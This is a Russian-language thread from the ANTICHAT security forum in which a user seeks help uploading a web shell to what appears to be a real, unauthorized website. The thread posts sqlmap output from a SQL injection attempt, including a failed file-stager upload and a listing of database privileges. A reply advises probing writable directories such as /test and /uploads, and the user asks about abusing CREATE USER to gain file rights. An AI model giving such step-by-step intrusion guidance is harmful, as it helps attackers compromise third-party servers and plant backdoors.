ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Хочу залить шелл, нужно знать путь куда залить.

есть доступ к phpinfo ()

там можно узнать необходимый мне путь?

Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.

robot.txt

User-Agent: *

Disallow: /public_html/Manage~/

Disallow: /public_html/test/

Disallow: /public_html/config.php

Allow: /

Allow: /public_html/

DOCUMENT_ROOT /home/bomarbg/public_html

[01:45:05] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 6.5

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL 5.0

[01:45:05] [INFO] going to use a web backdoor for command prompt

[01:45:05] [INFO] fingerprinting the back-end DBMS operating system

[01:45:05] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

[01:45:06] [WARNING] unable to retrieve automatically the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: /home/bomarbg/public_html

[01:45:10] [WARNING] unable to automatically parse any web server path

[01:45:10] [INFO] trying to upload the file stager on '/home/bomarbg/public_html/' via LIMIT 'LINES TERMINATED BY' method

[01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'

[01:45:12] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 4 times

[01:45:12] [INFO] fetched data logged to text files under 'C:\Users\.sqlmap\output\'
[*] shutting down at 01:45:12

magic_quotes_gpc Off

current user is DBA: True

Могу посмотреть и выводит --users --passwords --privileges --roles --threads=10

Прав на запись мб нету?

Как проверить через sqlmap

Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .

Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.

Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...

Пробуй всякие /images, /temp, /old, /download и т.п.

P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?

Я хочу залить shell

current user: 'auto12s786@localhost'

database management system users privileges:
[*]%auto12s786% (administrator) [12]:

privilege: CREATE USER

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHUTDOWN

privilege: SUPER

Файловых привилегий нет!

тогда когда какой вариант? создать пользователя который сможет? CREATE USER